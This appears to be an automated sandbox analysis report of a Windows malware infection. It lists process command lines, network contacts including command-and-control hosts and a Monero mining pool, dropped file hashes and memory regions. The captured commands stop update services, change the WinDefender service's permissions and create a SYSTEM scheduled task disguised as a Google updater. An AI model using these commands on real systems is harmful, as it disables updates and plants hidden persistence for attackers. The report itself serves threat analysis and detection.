C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
C:\Windows\SysWOW64\sc.exe
sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\windefender.exe
C:\Windows\windefender.exe
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qbjrr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
Network
| Country | Destination | Domain | Proto |
| US | 93.184.221.240:80 | tcp | |
| US | 8.8.8.8:53 | 146.78.124.51.in-addr.arpa | udp |
| RU | 5.42.65.80:80 | 5.42.65.80 | tcp |
| DE | 45.9.74.80:80 | 45.9.74.80 | tcp |
| US | 8.8.8.8:53 | 73.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 80.65.42.5.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 80.74.9.45.in-addr.arpa | udp |
| NL | 45.66.230.149:80 | 45.66.230.149 | tcp |
| US | 13.89.179.9:443 | tcp | |
| US | 8.8.8.8:53 | 149.230.66.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 158.240.127.40.in-addr.arpa | udp |
| US | 93.184.221.240:80 | tcp | |
| US | 93.184.221.240:80 | tcp | |
| US | 8.8.8.8:53 | rcn.tuktuk.ug | udp |
| NL | 85.209.3.4:11285 | rcn.tuktuk.ug | tcp |
| NL | 85.209.3.4:11285 | rcn.tuktuk.ug | tcp |
| US | 8.8.8.8:53 | host-file-host6.com | udp |
| N/A | 194.50.153.68:80 | host-file-host6.com | tcp |
| US | 8.8.8.8:53 | 4.3.209.85.in-addr.arpa | udp |
| US | 8.8.8.8:53 | host-host-file8.com | udp |
| NL | 85.209.3.4:11285 | rcn.tuktuk.ug | tcp |
| US | 8.8.8.8:53 | 68.153.50.194.in-addr.arpa | udp |
| NL | 45.12.253.56:80 | 45.12.253.56 | tcp |
| US | 8.8.8.8:53 | 56.253.12.45.in-addr.arpa | udp |
| GB | 96.16.110.41:443 | tcp | |
| US | 93.184.221.240:80 | tcp | |
| US | 8.8.8.8:53 | 8.3.197.209.in-addr.arpa | udp |
| US | 8.8.8.8:53 | d238f108-5235-4880-a175-a916ef0d018b.uuid.duniadekho.bar | udp |
| US | 8.8.8.8:53 | 161.252.72.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | server6.duniadekho.bar | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 8.8.8.8:53 | stun2.l.google.com | udp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| BG | 185.82.216.50:443 | server6.duniadekho.bar | tcp |
| IN | 172.253.121.127:19302 | stun2.l.google.com | udp |
| US | 8.8.8.8:53 | 233.129.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 127.121.253.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | luckytradeone.com | udp |
| US | 172.67.181.198:443 | luckytradeone.com | tcp |
| US | 8.8.8.8:53 | 50.216.82.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.181.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | xmr.2miners.com | udp |
| DE | 162.19.139.184:12222 | xmr.2miners.com | tcp |
| US | 8.8.8.8:53 | 184.139.19.162.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
| MD5 | a64a886a695ed5fb9273e73241fec2f7 |
| SHA1 | 363244ca05027c5beb938562df5b525a2428b405 |
| SHA256 | 563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144 |
| SHA512 | 122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474 |
C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
| MD5 | a64a886a695ed5fb9273e73241fec2f7 |
| SHA1 | 363244ca05027c5beb938562df5b525a2428b405 |
| SHA256 | 563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144 |
| SHA512 | 122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474 |
C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
| MD5 | a64a886a695ed5fb9273e73241fec2f7 |
| SHA1 | 363244ca05027c5beb938562df5b525a2428b405 |
| SHA256 | 563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144 |
| SHA512 | 122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474 |
C:\Users\Admin\AppData\Local\Temp\1000201001\setup.exe
| MD5 | 2d257873ee0ae75c9b89bd340e3e3da6 |
| SHA1 | 9dd9080df32b375f39df6470136a5bb107829eba |
| SHA256 | f6cf800d44ff24fc1d1c06ccb0df605c5585f56fd041d335a5fe15628a1e9428 |
| SHA512 | e89156f93c1ddb1292d31477e4d05937fc3a091a9868842f5cf861b9bea3c521c839cc557a8dcab0e3d651561b2d06392fcc9426278cd7797c2abeb6f5df5753 |
C:\Users\Admin\AppData\Local\Temp\1000201001\setup.exe
| MD5 | 2d257873ee0ae75c9b89bd340e3e3da6 |
| SHA1 | 9dd9080df32b375f39df6470136a5bb107829eba |
| SHA256 | f6cf800d44ff24fc1d1c06ccb0df605c5585f56fd041d335a5fe15628a1e9428 |
| SHA512 | e89156f93c1ddb1292d31477e4d05937fc3a091a9868842f5cf861b9bea3c521c839cc557a8dcab0e3d651561b2d06392fcc9426278cd7797c2abeb6f5df5753 |
C:\Users\Admin\AppData\Local\Temp\1000201001\setup.exe
| MD5 | 2d257873ee0ae75c9b89bd340e3e3da6 |
| SHA1 | 9dd9080df32b375f39df6470136a5bb107829eba |
| SHA256 | f6cf800d44ff24fc1d1c06ccb0df605c5585f56fd041d335a5fe15628a1e9428 |
| SHA512 | e89156f93c1ddb1292d31477e4d05937fc3a091a9868842f5cf861b9bea3c521c839cc557a8dcab0e3d651561b2d06392fcc9426278cd7797c2abeb6f5df5753 |
memory/2772-162-0x00000000018D0000-0x00000000018F6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe
| MD5 | 8670305fdaf49dc2fd18804bc8000bd2 |
| SHA1 | a1b57601e426f1c12a25251012c7ef2f3d1181e2 |
| SHA256 | f40cc09e6969d91062935094b84e5530ff17b140606f222e14755150688a5a34 |
| SHA512 | 9c4dc8036c8e85870d78f6c1cfe4176c62baf4e8bc6a0dc76eb217eb2a62aae6bac60a836ba7a8bdb1143d6ab889460ac140fa652450829a86f93048147735d1 |
C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe
| MD5 | 8670305fdaf49dc2fd18804bc8000bd2 |
| SHA1 | a1b57601e426f1c12a25251012c7ef2f3d1181e2 |
| SHA256 | f40cc09e6969d91062935094b84e5530ff17b140606f222e14755150688a5a34 |
| SHA512 | 9c4dc8036c8e85870d78f6c1cfe4176c62baf4e8bc6a0dc76eb217eb2a62aae6bac60a836ba7a8bdb1143d6ab889460ac140fa652450829a86f93048147735d1 |
C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe
| MD5 | 8670305fdaf49dc2fd18804bc8000bd2 |
| SHA1 | a1b57601e426f1c12a25251012c7ef2f3d1181e2 |
| SHA256 | f40cc09e6969d91062935094b84e5530ff17b140606f222e14755150688a5a34 |
| SHA512 | 9c4dc8036c8e85870d78f6c1cfe4176c62baf4e8bc6a0dc76eb217eb2a62aae6bac60a836ba7a8bdb1143d6ab889460ac140fa652450829a86f93048147735d1 |
memory/2772-179-0x0000000001900000-0x0000000001940000-memory.dmp
memory/3748-180-0x0000000000E50000-0x0000000000F0A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe
| MD5 | ebf830587e4df50f0a886fe4bf05bda0 |
| SHA1 | 3c0217098ca7b191d146b770eb366a9081187a66 |
| SHA256 | e669914a28ffc4b51c1f4e54efb0e9d6bd74a97fe293c7c8ba30b50ae4c508d6 |
| SHA512 | a90c26d81ca69687fc7136e9ce4ca8410ef9a217d81b9f2f3d4051bd5f32604d176951a8dc14a1b0bb0157770be745819fe3ef9d64dbd50a32034bee92593074 |
memory/3748-192-0x00000000058E0000-0x000000000597C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe
| MD5 | e858e636547aa1dff328554f5750cb37 |
| SHA1 | a96483d7314414755ae9f89e389843ae35d3fece |
| SHA256 | 7a33f13cab7536657d3e8c34d5d59b6f4eec7b479f1e852fe675b518e4138222 |
| SHA512 | 4f95096a29614c6c3b9096fc75ea24aca2e92d619888094a942832d637df9dd55ae1eaa98df37cf3c3d57ad5d633267d019a29cf8f165f09ec4f647981656c30 |
C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe
| MD5 | ebf830587e4df50f0a886fe4bf05bda0 |
| SHA1 | 3c0217098ca7b191d146b770eb366a9081187a66 |
| SHA256 | e669914a28ffc4b51c1f4e54efb0e9d6bd74a97fe293c7c8ba30b50ae4c508d6 |
| SHA512 | a90c26d81ca69687fc7136e9ce4ca8410ef9a217d81b9f2f3d4051bd5f32604d176951a8dc14a1b0bb0157770be745819fe3ef9d64dbd50a32034bee92593074 |
memory/1020-219-0x0000000001820000-0x0000000001835000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe
| MD5 | e858e636547aa1dff328554f5750cb37 |
| SHA1 | a96483d7314414755ae9f89e389843ae35d3fece |
| SHA256 | 7a33f13cab7536657d3e8c34d5d59b6f4eec7b479f1e852fe675b518e4138222 |
| SHA512 | 4f95096a29614c6c3b9096fc75ea24aca2e92d619888094a942832d637df9dd55ae1eaa98df37cf3c3d57ad5d633267d019a29cf8f165f09ec4f647981656c30 |
C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe
| MD5 | e858e636547aa1dff328554f5750cb37 |
| SHA1 | a96483d7314414755ae9f89e389843ae35d3fece |
| SHA256 | 7a33f13cab7536657d3e8c34d5d59b6f4eec7b479f1e852fe675b518e4138222 |
| SHA512 | 4f95096a29614c6c3b9096fc75ea24aca2e92d619888094a942832d637df9dd55ae1eaa98df37cf3c3d57ad5d633267d019a29cf8f165f09ec4f647981656c30 |
C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe
| MD5 | 8670305fdaf49dc2fd18804bc8000bd2 |
| SHA1 | a1b57601e426f1c12a25251012c7ef2f3d1181e2 |
| SHA256 | f40cc09e6969d91062935094b84e5530ff17b140606f222e14755150688a5a34 |
| SHA512 | 9c4dc8036c8e85870d78f6c1cfe4176c62baf4e8bc6a0dc76eb217eb2a62aae6bac60a836ba7a8bdb1143d6ab889460ac140fa652450829a86f93048147735d1 |
memory/4500-224-0x0000000000400000-0x0000000000409000-memory.dmp
memory/1020-226-0x0000000001840000-0x0000000001849000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe
| MD5 | e858e636547aa1dff328554f5750cb37 |
| SHA1 | a96483d7314414755ae9f89e389843ae35d3fece |
| SHA256 | 7a33f13cab7536657d3e8c34d5d59b6f4eec7b479f1e852fe675b518e4138222 |
| SHA512 | 4f95096a29614c6c3b9096fc75ea24aca2e92d619888094a942832d637df9dd55ae1eaa98df37cf3c3d57ad5d633267d019a29cf8f165f09ec4f647981656c30 |
C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe
| MD5 | ebf830587e4df50f0a886fe4bf05bda0 |
| SHA1 | 3c0217098ca7b191d146b770eb366a9081187a66 |
| SHA256 | e669914a28ffc4b51c1f4e54efb0e9d6bd74a97fe293c7c8ba30b50ae4c508d6 |
| SHA512 | a90c26d81ca69687fc7136e9ce4ca8410ef9a217d81b9f2f3d4051bd5f32604d176951a8dc14a1b0bb0157770be745819fe3ef9d64dbd50a32034bee92593074 |
memory/4500-236-0x0000000000400000-0x0000000000409000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe
| MD5 | 451af59f1dc7bf09eaad8c27aab0a8fe |
| SHA1 | a1e5d215d9e45937697d72e14d33476c6af4705c |
| SHA256 | 2273ad3c5739e3c75de32a37f690ccce141a76524c20cd773e267b6b93731606 |
| SHA512 | 39b70ffa5e0b56fc6b550d0d16d00aec809f366a5dc1027b418e3198ae86a950d07721ed749776f6b3d9ce5eeea3b24895bd58aee66daa2ba8a5b5176bf6d41d |
memory/2636-246-0x00007FFE58630000-0x00007FFE58632000-memory.dmp
memory/2636-247-0x00007FFE58640000-0x00007FFE58642000-memory.dmp
memory/2636-250-0x00007FFE583F0000-0x00007FFE583F2000-memory.dmp
memory/2636-259-0x00007FFE55E30000-0x00007FFE55E32000-memory.dmp
memory/2200-258-0x0000000002860000-0x0000000002C58000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe
| MD5 | 451af59f1dc7bf09eaad8c27aab0a8fe |
| SHA1 | a1e5d215d9e45937697d72e14d33476c6af4705c |
| SHA256 | 2273ad3c5739e3c75de32a37f690ccce141a76524c20cd773e267b6b93731606 |
| SHA512 | 39b70ffa5e0b56fc6b550d0d16d00aec809f366a5dc1027b418e3198ae86a950d07721ed749776f6b3d9ce5eeea3b24895bd58aee66daa2ba8a5b5176bf6d41d |
memory/2636-254-0x00007FFE55E20000-0x00007FFE55E22000-memory.dmp
memory/2636-253-0x00007FFE58400000-0x00007FFE58402000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe
| MD5 | 451af59f1dc7bf09eaad8c27aab0a8fe |
| SHA1 | a1e5d215d9e45937697d72e14d33476c6af4705c |
| SHA256 | 2273ad3c5739e3c75de32a37f690ccce141a76524c20cd773e267b6b93731606 |
| SHA512 | 39b70ffa5e0b56fc6b550d0d16d00aec809f366a5dc1027b418e3198ae86a950d07721ed749776f6b3d9ce5eeea3b24895bd58aee66daa2ba8a5b5176bf6d41d |
memory/2636-260-0x00007FF774FE0000-0x00007FF7767A9000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe
| MD5 | 8670305fdaf49dc2fd18804bc8000bd2 |
| SHA1 | a1b57601e426f1c12a25251012c7ef2f3d1181e2 |
| SHA256 | f40cc09e6969d91062935094b84e5530ff17b140606f222e14755150688a5a34 |
| SHA512 | 9c4dc8036c8e85870d78f6c1cfe4176c62baf4e8bc6a0dc76eb217eb2a62aae6bac60a836ba7a8bdb1143d6ab889460ac140fa652450829a86f93048147735d1 |
memory/3172-266-0x00000000025F0000-0x0000000002606000-memory.dmp
memory/4500-268-0x0000000000400000-0x0000000000409000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe
| MD5 | ebf830587e4df50f0a886fe4bf05bda0 |
| SHA1 | 3c0217098ca7b191d146b770eb366a9081187a66 |
| SHA256 | e669914a28ffc4b51c1f4e54efb0e9d6bd74a97fe293c7c8ba30b50ae4c508d6 |
| SHA512 | a90c26d81ca69687fc7136e9ce4ca8410ef9a217d81b9f2f3d4051bd5f32604d176951a8dc14a1b0bb0157770be745819fe3ef9d64dbd50a32034bee92593074 |
memory/2772-279-0x0000000000400000-0x00000000017FB000-memory.dmp
memory/1284-288-0x00007FF774FE0000-0x00007FF7767A9000-memory.dmp
memory/2200-289-0x0000000002D60000-0x000000000364B000-memory.dmp
memory/2940-293-0x00000000050A0000-0x00000000050B0000-memory.dmp
memory/3748-291-0x0000000005AB0000-0x0000000005AC0000-memory.dmp
memory/2940-294-0x0000000004D70000-0x0000000004D85000-memory.dmp
memory/2940-296-0x0000000004D70000-0x0000000004D85000-memory.dmp
memory/2940-301-0x0000000004D70000-0x0000000004D85000-memory.dmp
memory/2940-305-0x0000000004D70000-0x0000000004D85000-memory.dmp
memory/2200-298-0x0000000000400000-0x0000000000D1B000-memory.dmp
memory/2940-309-0x0000000004D70000-0x0000000004D85000-memory.dmp
memory/2940-313-0x0000000004D70000-0x0000000004D85000-memory.dmp
memory/2940-319-0x0000000004D70000-0x0000000004D85000-memory.dmp
memory/2940-325-0x0000000004D70000-0x0000000004D85000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
| MD5 | a64a886a695ed5fb9273e73241fec2f7 |
| SHA1 | 363244ca05027c5beb938562df5b525a2428b405 |
| SHA256 | 563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144 |
| SHA512 | 122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474 |
memory/3048-358-0x0000000000400000-0x0000000000426000-memory.dmp
memory/4768-363-0x0000000005B50000-0x0000000005B60000-memory.dmp
memory/3748-361-0x00000000032E0000-0x00000000032E1000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\updEdge.exe.log
| MD5 | 8334a471a4b492ece225b471b8ad2fc8 |
| SHA1 | 1cb24640f32d23e8f7800bd0511b7b9c3011d992 |
| SHA256 | 5612afe347d8549cc95a0c710602bcc7d7b224361b613c0a6ba362092300c169 |
| SHA512 | 56ae2e83355c331b00d782797f5664c2f373eac240e811aab978732503ae05eb20b08730d2427ed90efa5a706d71b42b57153596a45a6b5592e3dd9128b81c36 |
memory/2072-368-0x0000000005870000-0x0000000005E88000-memory.dmp
memory/2072-371-0x00000000052D0000-0x00000000052E2000-memory.dmp
memory/2072-374-0x0000000005400000-0x000000000550A000-memory.dmp
memory/3172-386-0x0000000008360000-0x0000000008370000-memory.dmp
memory/2072-393-0x0000000005370000-0x0000000005380000-memory.dmp
memory/3048-390-0x0000000005540000-0x0000000005550000-memory.dmp
memory/3048-387-0x0000000005210000-0x000000000524C000-memory.dmp
memory/3172-411-0x0000000008620000-0x0000000008630000-memory.dmp
memory/3172-409-0x0000000008620000-0x0000000008630000-memory.dmp
memory/4768-412-0x00000000032E0000-0x00000000032E1000-memory.dmp
memory/2768-416-0x00000000056A0000-0x00000000056B0000-memory.dmp
memory/3048-417-0x00000000055C0000-0x0000000005626000-memory.dmp
memory/2200-419-0x0000000002D60000-0x000000000364B000-memory.dmp
memory/2072-420-0x0000000006230000-0x00000000062C2000-memory.dmp
memory/2072-421-0x0000000006880000-0x0000000006E24000-memory.dmp
memory/2072-422-0x0000000006350000-0x00000000063C6000-memory.dmp
memory/2072-423-0x00000000065A0000-0x0000000006762000-memory.dmp
memory/2072-425-0x0000000007360000-0x000000000788C000-memory.dmp
memory/2072-426-0x0000000006490000-0x00000000064AE000-memory.dmp
memory/1388-429-0x0000000004E60000-0x0000000004E96000-memory.dmp
memory/1388-431-0x0000000005530000-0x0000000005B58000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\AppLaunch.exe.log
| MD5 | 67345b374ece01694478cd821081caf8 |
| SHA1 | 04b3bacfe792cfaffb935ecd2b80813b3306b67b |
| SHA256 | 5a4a3f6ae9d338ce1639c47779eca19a0e827445e529d6fcf7753e670bf8b4f1 |
| SHA512 | fe0c99e9731d3601e701e2bb7c8e542654447822a61c251e0124a1b9643f6264600f45ca8010c6150c9cef6903321f3769fa77008334f7a3c92e0026f83d6853 |
memory/1388-432-0x0000000005CA0000-0x0000000005CC2000-memory.dmp
memory/2072-434-0x0000000005370000-0x0000000005380000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ie0elnb3.3rm.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3172-440-0x0000000008620000-0x0000000008630000-memory.dmp
memory/1388-441-0x0000000004EF0000-0x0000000004F00000-memory.dmp
memory/1388-446-0x0000000005E80000-0x0000000005EE6000-memory.dmp
memory/1388-447-0x0000000006440000-0x000000000645E000-memory.dmp
memory/3172-448-0x0000000008620000-0x0000000008630000-memory.dmp
memory/3172-449-0x0000000008620000-0x0000000008630000-memory.dmp
memory/1388-450-0x0000000006990000-0x00000000069D4000-memory.dmp
memory/1388-451-0x0000000004EF0000-0x0000000004F00000-memory.dmp
memory/1388-452-0x0000000007E60000-0x00000000084DA000-memory.dmp
memory/4508-454-0x00000153F2A50000-0x00000153F2A72000-memory.dmp
memory/1388-453-0x0000000007800000-0x000000000781A000-memory.dmp
memory/4508-456-0x00000153F2C40000-0x00000153F2C50000-memory.dmp
memory/4508-455-0x00000153F2C40000-0x00000153F2C50000-memory.dmp
memory/4508-467-0x00000153F2C40000-0x00000153F2C50000-memory.dmp
memory/4508-466-0x00000153F2C40000-0x00000153F2C50000-memory.dmp
memory/1388-470-0x00000000079B0000-0x00000000079E2000-memory.dmp
memory/1388-471-0x0000000073850000-0x000000007389C000-memory.dmp
memory/1388-472-0x000000006E880000-0x000000006EBD4000-memory.dmp
memory/1388-482-0x0000000007990000-0x00000000079AE000-memory.dmp
memory/1388-484-0x0000000007AE0000-0x0000000007AEA000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | d85ba6ff808d9e5444a4b369f5bc2730 |
| SHA1 | 31aa9d96590fff6981b315e0b391b575e4c0804a |
| SHA256 | 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f |
| SHA512 | 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249 |
memory/1388-486-0x000000007FBB0000-0x000000007FBC0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | cadef9abd087803c630df65264a6c81c |
| SHA1 | babbf3636c347c8727c35f3eef2ee643dbcc4bd2 |
| SHA256 | cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438 |
| SHA512 | 7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085 |
memory/1388-497-0x0000000007BA0000-0x0000000007C36000-memory.dmp
memory/1124-498-0x000001EF9A050000-0x000001EF9A060000-memory.dmp
memory/1124-499-0x000001EF9A050000-0x000001EF9A060000-memory.dmp
memory/1124-500-0x000001EF9A050000-0x000001EF9A060000-memory.dmp
memory/1388-501-0x0000000007B40000-0x0000000007B4E000-memory.dmp
memory/1124-503-0x000001EF9A050000-0x000001EF9A060000-memory.dmp
memory/1388-510-0x0000000007C40000-0x0000000007C5A000-memory.dmp
memory/1388-514-0x0000000007B90000-0x0000000007B98000-memory.dmp
memory/4220-520-0x0000020A1CCC0000-0x0000020A1CCD0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe
| MD5 | ebf830587e4df50f0a886fe4bf05bda0 |
| SHA1 | 3c0217098ca7b191d146b770eb366a9081187a66 |
| SHA256 | e669914a28ffc4b51c1f4e54efb0e9d6bd74a97fe293c7c8ba30b50ae4c508d6 |
| SHA512 | a90c26d81ca69687fc7136e9ce4ca8410ef9a217d81b9f2f3d4051bd5f32604d176951a8dc14a1b0bb0157770be745819fe3ef9d64dbd50a32034bee92593074 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 9bc110200117a3752313ca2acaf8a9e1 |
| SHA1 | fda6b7da2e7b0175b391475ca78d1b4cf2147cd3 |
| SHA256 | c88e4bbb64f7fa31429ebe82c1cf07785c44486f37576f783a26ac856e02a4eb |
| SHA512 | 1f1af32aa18a8cbfcc65b0d4fb7e6ca2705f125eaa85789e981ee68b90c64522e954825abf460d4b4f97567715dfae8d9b0a25a4d54d10bc4c257c472f2e80fb |
C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe
| MD5 | 451af59f1dc7bf09eaad8c27aab0a8fe |
| SHA1 | a1e5d215d9e45937697d72e14d33476c6af4705c |
| SHA256 | 2273ad3c5739e3c75de32a37f690ccce141a76524c20cd773e267b6b93731606 |
| SHA512 | 39b70ffa5e0b56fc6b550d0d16d00aec809f366a5dc1027b418e3198ae86a950d07721ed749776f6b3d9ce5eeea3b24895bd58aee66daa2ba8a5b5176bf6d41d |
C:\Program Files\Google\Chrome\updater.exe
| MD5 | ebf830587e4df50f0a886fe4bf05bda0 |
| SHA1 | 3c0217098ca7b191d146b770eb366a9081187a66 |
| SHA256 | e669914a28ffc4b51c1f4e54efb0e9d6bd74a97fe293c7c8ba30b50ae4c508d6 |
| SHA512 | a90c26d81ca69687fc7136e9ce4ca8410ef9a217d81b9f2f3d4051bd5f32604d176951a8dc14a1b0bb0157770be745819fe3ef9d64dbd50a32034bee92593074 |
C:\Windows\System32\drivers\etc\hosts
| MD5 | 00930b40cba79465b7a38ed0449d1449 |
| SHA1 | 4b25a89ee28b20ba162f23772ddaf017669092a5 |
| SHA256 | eda1aae2c8fce700e3bdbe0186cf3db88400cf0ac13ec736e84dacba61628a01 |
| SHA512 | cbe4760ec041e7da7ab86474d5c82969cfccb8ccc5dbdac9436862d5b1b86210ab90754d3c8da5724176570d8842e57a716a281acba8719e90098a6f61a17c62 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 9bc110200117a3752313ca2acaf8a9e1 |
| SHA1 | fda6b7da2e7b0175b391475ca78d1b4cf2147cd3 |
| SHA256 | c88e4bbb64f7fa31429ebe82c1cf07785c44486f37576f783a26ac856e02a4eb |
| SHA512 | 1f1af32aa18a8cbfcc65b0d4fb7e6ca2705f125eaa85789e981ee68b90c64522e954825abf460d4b4f97567715dfae8d9b0a25a4d54d10bc4c257c472f2e80fb |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 9c260eec9480ce84b15f1f374765472f |
| SHA1 | 878893212a4afba68936571299d72d3f368947c4 |
| SHA256 | 8156da2387bc5c58ca7c32cca44c6d2dbe61fb2a7ea73be6f0673c270521296c |
| SHA512 | a8334295234a90fb816633c0f01ccfaaaa70c64f52be466ff3c9086d2642f40ae7f71e229125c6a61de1c632c844b8c822dd956bc84967cee8dd1bdc672c5db2 |
C:\Windows\System32\drivers\etc\hosts
| MD5 | 00930b40cba79465b7a38ed0449d1449 |
| SHA1 | 4b25a89ee28b20ba162f23772ddaf017669092a5 |
| SHA256 | eda1aae2c8fce700e3bdbe0186cf3db88400cf0ac13ec736e84dacba61628a01 |
| SHA512 | cbe4760ec041e7da7ab86474d5c82969cfccb8ccc5dbdac9436862d5b1b86210ab90754d3c8da5724176570d8842e57a716a281acba8719e90098a6f61a17c62 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 2e907f77659a6601fcc408274894da2e |
| SHA1 | 9f5b72abef1cd7145bf37547cdb1b9254b4efe9d |
| SHA256 | 385da35673330e21ac02545220552fe301fe54dedefbdafc097ac4342a295233 |
